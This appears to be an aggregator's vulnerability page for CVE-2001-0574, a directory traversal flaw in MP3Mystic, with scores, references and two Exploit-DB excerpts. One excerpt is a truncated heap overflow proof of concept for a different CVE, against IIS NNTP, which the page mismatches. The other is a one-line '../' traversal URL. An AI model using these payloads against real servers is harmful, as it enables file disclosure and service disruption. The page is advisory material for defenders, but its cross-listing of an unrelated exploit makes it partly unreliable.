CVE-2001-0574
Published 2001-08-14
CVE-2001-0574: Directory traversal vulnerability in MP3Mystic prior to 1.04b3 allows a remote attacker to download arbitrary files via a '..' (dot dot) in the URL.
Priority: P4 / 25
CVSS 2.0: 5 (medium)
Vector: AV:N/AC:L/Au:N/C:P/I:N/A:N
EXPLOIT
EPSS: 3.67% (88.3th percentile)
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| jason_rahaim | mp3mystic | — | — |
| jason_rahaim | mp3mystic | — | — |
| jason_rahaim | mp3mystic | — | — |
| jason_rahaim | mp3mystic | — | — |
No detection rules found.
Exploit-DB
Microsoft Windows NNTP Service (XPAT) - Denial of Service (MS04-036)
exploitdb·2004-10-16
CVE-2004-0574 Microsoft Windows NNTP Service (XPAT) - Denial of Service (MS04-036)
---
#--
# IIS NNTP Service XPAT command heap overflow proof of concept
#
# Author:
# Lucas Lavarello (lucas at coresecurity dot com)
# Juliano Rizzo (juliano at coresecurity dot com)
#
# Copyright (c) 2001-2004 CORE Security Technologies, CORE SDI Inc.
# All rights reserved.
#
# THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED. IN NO EVENT SHALL CORE SDI Inc. BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY OR
# CONSEQUENTIAL DAMAGES RESULTING FROM THE USE OR MISUSE OF
# THIS SOFTWARE
#
# www coresecurity com
#--
from socket import *
host = "127.0.0.1"
pat = "C"*1946 + " " + "X"*10
newsgroup = "control.newgroup"
sock = socket(AF_INET, SOCK_STREAM)
sock.con
Exploit-DB
Jason Rahaim MP3Mystic 1.0.x - Server Directory Traversal
exploitdb·2001-05-07
CVE-2001-0574 Jason Rahaim MP3Mystic 1.0.x - Server Directory Traversal
---
source: https://www.securityfocus.com/bid/2699/info
A vulnerability exists in Jason Rahaim's MP3Mystic Server which allows a remote user to traverse the directories of a target host. This may lead to the disclosure of file and directory contents. Arbitrary directories can be accessed through the inclusion of double dot '../' sequences when submitting a URL.
www.example.com/../scandisk.log
No writeups or analysis indexed.
http://archives.neohapsis.com/archives/bugtraq/2001-05/0046.html
http://mp3mystic.com/mp3mystic/news.phtml
http://www.osvdb.org/1815
http://www.securityfocus.com/bid/2699
https://exchange.xforce.ibmcloud.com/vulnerabilities/6504
Published: 2001-08-14